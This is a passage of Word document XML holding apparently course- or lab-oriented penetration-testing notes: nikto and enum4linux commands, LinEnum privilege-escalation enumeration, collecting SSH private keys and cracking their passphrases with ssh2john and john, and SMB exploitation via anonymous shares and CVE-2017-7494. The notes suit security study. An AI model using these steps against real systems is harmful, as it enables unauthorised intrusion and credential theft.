        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="00C65B2F">
        <w:t>nikto -h &lt;ip&gt;:&lt;target port&gt;/&lt;directory&gt;/&lt;subdirectory&gt; -id &lt;id:password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D925791" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>smb anonymous login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62361EBB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if enum4linux reveal anon availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5145C998" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D53A801" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>LinEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D611BC3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if you cant ssh LinEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6172C2CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>scp into dev/shm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8572B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>chmod +x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7724C989" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>./LinEnum.sh | tee &lt;outputfile.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59548075" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>LinPeas alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0F3BB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerate directories with ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0022FDA4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>search for .ssh keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969329A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>save private keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7165D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mark as chmod 600 for ssh use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B1BC88" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>passphrase protection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789AA9EF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ssh2john.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607631D4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>python3 /usr/share/john/ssh2john.py id_rsa_kay &gt; id_rsa_kay_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31628388" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>john id_rsa_kay_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E462C" w14:textId="3F124629" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Login and Escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C9D2BA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1704815D" w14:textId="30FE7CD5" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Network Service – learn about, then enumerate and exploit a variety of network services and misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E39372" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Understanding SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9C3AE8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Server Message Block Protocol – client-server communication protocol used for sharing access to files, printers, serial ports, and other network resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C9C7C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Response-request protocol = transmits multiple messages between client and server to establish connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C48D1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Connect via NetBIOS over TCP/IP [RFC1001&amp;RFC1002], NetBEUI, or IPX/SPX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376258DC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Once connection is established, clients send commands (SMBs) to server to allow access shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F7CF14" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Done over the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D02655" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Windows and Samba (Unix) support SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B4C37" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487C2CE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Process of gathering information on a target in order to find potential attack vectors and aid in exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47493718" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Avoid ineffective or overtly destructive attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED380E3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gather passwords, usernames, network info, hostnames, application data, servers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73047741" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FDCF2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>First step in enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ABEBC8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find out info about services, applications, structure, OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B813684" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Nmap -A -p- flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17153E26" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enum4Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FDE344" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Used to enumerate SMB shares on both Linux and Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0468AB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Wrapper around tools in Samba package enabling quick extraction of information from target pertaining to SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33302E1B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax: enum4linux [options] &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A658E4F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>TAGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05115800" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-U – get user list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569AFAD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-M – get machine list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428531C0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-N – get name list dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD26B8B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-S – get share list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45747056" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-P – get password policy information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F067FF7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-G – get group and member list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767EFB6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>- A – all the above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963EFCF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search for share enumeration on &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3B81C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EAD0D5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Some exploits for SMB – like CVE-2017-7494</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A39DF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Misconfiguration more likely path to success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AE637" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Anonymous SMB share access – common misconfiguration that allows gain information to deploy shell</w:t>
      </w:r>
